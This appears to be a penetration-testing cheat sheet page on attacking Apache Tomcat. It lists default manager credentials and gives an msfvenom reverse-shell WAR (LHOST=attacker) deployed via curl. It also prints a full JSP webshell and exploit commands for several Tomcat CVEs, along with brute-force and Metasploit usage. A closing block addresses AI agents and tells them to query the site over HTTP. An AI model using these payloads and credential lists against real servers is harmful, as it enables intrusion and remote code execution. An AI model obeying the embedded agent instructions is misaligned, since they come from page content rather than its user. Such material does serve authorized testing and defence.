# Tomcat
Apache Tomcat security testing - enumeration, default credentials, manager exploitation, and common CVEs.
## Enumeration
### Version Detection
```bash
# Error pages often reveal version
curl -v https://target.com/nonexistent 2>&1 | grep "Tomcat"
# Server header
curl -I https://target.com | grep Server
# Documentation pages
/docs/
/RELEASE-NOTES.txt
```
### Default Paths
```bash
# Manager interfaces
/manager/html # Web Application Manager
/manager/text # Text interface
/manager/jmxproxy # JMX proxy
/manager/status # Server status
/host-manager/html # Virtual Host Manager
# Admin console (older versions)
/admin/
# Status page
/status
```
### Example Applications (often left enabled)
```bash
# Tomcat 4.x - 7.x example scripts (information disclosure)
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp # Shows server info, headers
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
# Session manipulation
/examples/jsp/sessions/carts.html # Can be used for session testing
```
## Default Credentials
```
# Common default credentials for Tomcat Manager
admin:admin
admin:password
admin:tomcat
tomcat:tomcat
tomcat:s3cret
manager:manager
role1:role1
root:root
both:tomcat
admin:changethis
```
### Credentials Location
```bash
# Tomcat users configuration
$CATALINA_HOME/conf/tomcat-users.xml
/etc/tomcat/tomcat-users.xml
/var/lib/tomcat8/conf/tomcat-users.xml
/opt/tomcat/conf/tomcat-users.xml
# Example tomcat-users.xml content:
```
## Manager Exploitation
### WAR File Deployment (RCE)
```bash
# Generate malicious WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker LPORT=4444 -f war > shell.war
# Deploy via curl
curl -u 'tomcat:tomcat' --upload-file shell.war \
"https://target.com/manager/text/deploy?path=/shell"
# Alternative: Use text interface
curl -u 'tomcat:tomcat' \
"https://target.com/manager/text/deploy?war=file:/path/to/shell.war&path=/shell"
# Access shell
curl https://target.com/shell/
# Undeploy when done
curl -u 'tomcat:tomcat' "https://target.com/manager/text/undeploy?path=/shell"
```
### Manual JSP Webshell
```jsp
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String dirone = dis.readLine();
while(dirone != null) {
out.println(dirone);
dirone = dis.readLine();
}
}
%>
```
## Common CVEs
### CVE-2017-12615 (PUT Method RCE)
```bash
# Affects Tomcat 7.0.0 - 7.0.79 (Windows)
# Upload JSP via PUT request
curl -X PUT "https://target.com/shell.jsp/" -d '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'
curl -X PUT "https://target.com/shell.jsp%20" -d '<% ... %>' # Space bypass
curl -X PUT "https://target.com/shell.jsp::$DATA" -d '<% ... %>' # NTFS stream
```
### CVE-2019-0232 (CGI RCE)
```bash
# Affects Windows Tomcat with CGI enabled
# Command injection via batch file
curl "https://target.com/cgi-bin/test.bat?&whoami"
```
### CVE-2020-1938 (Ghostcat - AJP)
```bash
# Affects Tomcat with AJP enabled (port 8009)
# File read/include via AJP protocol
# Check if AJP port open
nmap -p 8009 target.com
# Exploit
# https://github.com/AhmedMohamedDev/CNVD-2020-10487-Tomcat-Ajp-lfi
python ajpShooter.py https://target.com 8009 /WEB-INF/web.xml read
# For RCE, upload file then include it
python ajpShooter.py https://target.com 8009 /shell.txt eval
```
### CVE-2020-9484 (Deserialization)
```bash
# Session persistence deserialization
# Requires: PersistentManager, FileStore, attacker file upload
# Craft malicious session
java -jar ysoserial.jar CommonsCollections2 'id' > /path/session.session
# Trigger via Cookie
curl -H "Cookie: JSESSIONID=../../path/session" https://target.com/
```
## JMX Exploitation
```bash
# If JMX enabled without auth
# Connect with jconsole or custom client
# RCE via MLet
# Create malicious MBean
```
## AJP Protocol Testing
```bash
# Nmap AJP scripts
nmap -sV -p 8009 --script ajp-auth,ajp-methods target.com
# AJP request
# https://github.com/AhmedMohamedDev/ajp-client
python3 ajp_client.py target.com 8009 /manager/html
```
## Tools
```bash
# Tomcat bruteforce
# https://github.com/AhmedMohamedDev/tomcat-manager-bruteforce
python3 tomcat_bruteforce.py -U https://target.com/manager/html
# Metasploit
use auxiliary/scanner/http/tomcat_mgr_login
use exploit/multi/http/tomcat_mgr_deploy
# Nuclei
nuclei -t http/cves/2020/CVE-2020-1938.yaml -u https://target.com
nuclei -t http/default-logins/tomcat* -u https://target.com
```
## Related Topics
* [Web Shells](/enumeration/web/web-shells.md) - JSP shells
* [Deserialization](/enumeration/web/deserialization.md) - Java deserialization
* [Reverse Shells](/exploitation/reverse-shells.md)
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.pentest-book.com/enumeration/webservices/tomcat.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.